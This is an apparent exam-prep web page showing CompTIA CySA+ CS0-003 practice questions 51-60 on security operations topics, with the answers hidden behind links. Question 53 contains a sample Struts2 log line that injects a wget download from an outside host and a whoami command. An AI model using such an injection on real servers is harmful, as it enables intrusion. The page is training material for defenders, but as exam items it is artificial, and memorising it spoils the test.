Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA CompTIA CySA+ CS0-003 Questions and answers with CertsForce

Viewing page 6 out of 15 pages
Viewing questions 51-60 out of questions
Questions # 51:

A corporation wants to implement an agent-based endpoint solution to help:

    Flag various threats

    Review vulnerability feeds

    Aggregate data

    Provide real-time metrics by using scripting languages

Which of the following tools should the corporation implement to reach this goal?

Options:

A.

DLP


B.

Heuristics


C.

SOAR


D.

NAC


Expert Solution
Questions # 52:

Several incidents have occurred with a legacy web application that has had little development work completed. Which of the following is the most likely cause of the incidents?

Options:

A.

Misconfigured web application firewall


B.

Data integrity failure


C.

Outdated libraries


D.

Insufficient logging


Expert Solution
Questions # 53:

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

http:x:33:33::/srv/http:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl. < init > (FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A.

Create a backdoor root account named zsh.


B.

Execute commands through an unsecured service account.


C.

Send a beacon to a command-and-control server.


D.

Perform a denial-of-service attack on the web server.


Expert Solution
Questions # 54:

A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.

Instructions:

Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.

Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results.

The Linux Web Server, File-Print Server and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please select the Reset All button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

Question # 54

Question # 54


Expert Solution
Questions # 55:

A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:

getconnection (database01, " alpha " , " AXTV. 127GdCx94GTd " ) ;

Which of the following is the most likely vulnerability in this system?

Options:

A.

Lack of input validation


B.

SQL injection


C.

Hard-coded credential


D.

Buffer overflow attacks


Expert Solution
Questions # 56:

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

Options:

A.

Log retention


B.

Log rotation


C.

Maximum log size


D.

Threshold value


Expert Solution
Questions # 57:

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

Options:

A.

The current scanners should be migrated to the cloud


B.

Cloud-specific misconfigurations may not be detected by the current scanners


C.

Existing vulnerability scanners cannot scan laaS systems


D.

Vulnerability scans on cloud environments should be performed from the cloud


Expert Solution
Questions # 58:

Which of the following would eliminate the need for different passwords for a variety or internal application?

Options:

A.

CASB


B.

SSO


C.

PAM


D.

MFA


Expert Solution
Questions # 59:

An analyst is reviewing system logs while threat hunting:

Question # 59

Which of the following hosts should be investigated first?

Options:

A.

PC1


B.

PC2


C.

PC3


D.

PC4


E.

PC5


Expert Solution
Questions # 60:

Which of the following would likely be used to update a dashboard that integrates…..

Options:

A.

Webhooks


B.

Extensible Markup Language


C.

Threat feed combination


D.

JavaScript Object Notation


Expert Solution
Viewing page 6 out of 15 pages
Viewing questions 51-60 out of questions